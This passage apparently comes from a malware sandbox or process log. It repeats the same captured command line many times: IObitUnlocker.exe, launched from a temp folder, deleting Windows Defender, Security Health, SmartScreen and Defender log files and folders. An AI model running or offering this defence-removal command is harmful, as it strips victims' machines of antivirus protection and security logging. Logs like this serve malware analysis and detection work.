64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"

C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe

C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"

C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe

C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"

C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe

C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"

C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe

C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"

C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe

C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"

C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe

C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"

C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe

C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"

C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe

C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"

C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe

C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"

C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe

C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"

C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe

C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"

C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe

C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\